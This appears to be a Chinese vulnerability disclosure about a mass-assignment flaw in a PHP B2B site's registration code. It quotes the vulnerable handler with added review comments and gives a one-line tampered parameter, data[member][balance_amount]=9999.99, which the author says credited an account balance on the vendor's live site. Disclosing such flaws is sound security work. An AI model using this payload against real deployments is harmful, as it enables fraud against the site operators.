rt
详细说明:
看到注册用户处
if(isset($_POST['register'])){
    // Registration handler (excerpt: the enclosing if() is not closed in the quoted snippet).
    $is_company = false;
    $if_need_check = false;
    $register_type = trim($_POST['register']);
    $register_typename = trim($_POST['typename']);
    // NOTE(review): what pb_submit_check('data') validates or strips is not visible here —
    // confirm it does not allow-list the data[member][*] keys, because nothing below does.
    pb_submit_check('data');
    // $register_typename is raw POST input concatenated into the SQL string; unless an upstream
    // filter escapes it, this lookup should use an escaped/parameterised value.
    $default_membergroupid_res = $pdb->GetRow("SELECT * FROM {$tb_prefix}membertypes WHERE name='".$register_typename."'");
    $default_membergroupid = $default_membergroupid_res['default_membergroup_id'];
    // Fall back to the group flagged is_default when the member type carries no default group.
    if(empty($default_membergroupid)) $default_membergroupid = $membergroup->field("id","is_default=1");
    if ($default_membergroupid_res['id']>1) { $is_company = true; }
    // setParams() takes no explicit input here; from Add() below, the member row is read back from
    // $member->params['data']['member'], which appears to be populated from the request's data[]
    // array. Only the keys assigned explicitly below are controlled by the server; any other
    // data[member][*] key the client supplies (balance_amount in the PoC above) is passed through
    // to Add() unchanged. The saved row should be built from an allow-list of registration fields.
    $member->setParams();
    $memberfield->setParams();
    $member->params['data']['member']['membergroup_id'] = $default_membergroupid;
    // $default_membergroupid comes from the DB (or the is_default fallback) and is interpolated
    // unquoted into the id= clause.
    $time_limits = $pdb->GetOne("SELECT default_live_time FROM {$tb_prefix}membergroups WHERE id={$default_membergroupid}");
    $member->params['data']['member']['service_start_date'] = $time_stamp;
    $member->params['data']['member']['service_end_date'] = $membergroup->getServiceEndtime($time_limits);
    $member->params['data']['member']['membertype_id'] = ($is_company)?2:1;
    // New account starts unapproved (status 0) when manual review is enabled. Note that the loose
    // comparison $member_reg_auth!=0 already covers the =="1" case.
    if($member_reg_auth=="1" || $member_reg_auth!=0 || !empty($G['setting']['new_userauth'])){
        $member->params['data']['member']['status'] = 0;
        $if_need_check = true;
    }else{
        $member->params['data']['member']['status'] = 1;
    }
    $updated = false;
    $updated = $member->Add();
跟进add
function Add() {
    // Inserts the member row held in $this->params['data']['member']. Returns false when a
    // required field is missing (excerpt: the body is cut off after the save() call).
    global $_PB_CACHE, $memberfield, $phpb2b_auth_key, $if_need_check;
    $error_msg = array();
    // Reject the request when any of the three mandatory fields is missing (empty() also rejects "0").
    if (empty($this->params['data']['member']['username']) or empty($this->params['data']['member']['userpass']) or empty($this->params['data']['member']['email'])) return false;
    $space_name = $this->params['data']['member']['username'];
    $userpass = $this->params['data']['member']['userpass']; // plaintext copy; unused in the visible excerpt
    $this->params['data']['member']['userpass'] = $this->authPasswd($this->params['data']['member']['userpass']);
    if(empty($this->params['data']['member']['space_name'])) $this->params['data']['member']['space_name'] = PbController::toAlphabets($space_name);//Todo:
    $uip = pb_ip2long(pb_getenv('REMOTE_ADDR'));
    if(empty($uip)){
        // NOTE(review): no exit() follows the redirect — confirm pheader() terminates the
        // request, otherwise execution continues into the save below.
        pheader("location:".URL."redirect.php?message=".urlencode(L('sys_error')));
    }
    $this->params['data']['member']['last_login'] = $this->params['data']['member']['created'] = $this->params['data']['member']['modified'] = $this->timestamp;
    $this->params['data']['member']['last_ip'] = pb_get_client_ip('str');
    $email_exists = $this->checkUserExistsByEmail($this->params['data']['member']['email']);
    if ($email_exists) {
        // NOTE(review): unlike the username check, this branch does not skip the save —
        // confirm flash() with a 0 third argument aborts the request.
        flash("email_exists", null, 0);
    }
    $if_exists = $this->checkUserExist($this->params['data']['member']['username']);
    if ($if_exists) {
        flash('member_has_exists', null, 0);
    }else{
        // The whole member array is handed to save() as-is. Apart from userpass, space_name,
        // the timestamps and last_ip set above, no key is validated or removed, so every
        // client-supplied data[member][*] column reaches the row. Build the array to persist
        // from an explicit list of registration fields instead.
        $this->save($this->params['data']['member']);
save 函数对我们的 POST 数据做了 foreach
function save($obj_name, $obj_id, $data) {
    // Persists selected entries of $data for one object (excerpt: the foreach and the function
    // are not closed in the quoted snippet). Returns false on empty input.
    // NOTE(review): this takes three parameters, while Add() above calls $this->save() with a
    // single argument, and it only forwards title/keyword/description — it is likely a different
    // class's save() than the one Add() invokes; confirm which method actually writes the member row.
    if (empty($data)) {
        return false;
    }
    foreach ($data as $key=>$val) {
        // Only these three keys are stored (non-strict in_array); every other key is ignored here.
        if (in_array($key, array('title', 'keyword', 'description'))) {
            $this->add($obj_id, $obj_name, $key, $val);
        }
官网测试下
我们注册用户时，抓包并添加参数
data%5Bmember%5D%5Bbalance_amount%5D=9999.99

成功充值。

漏洞证明:

修复方案:
你们更加专业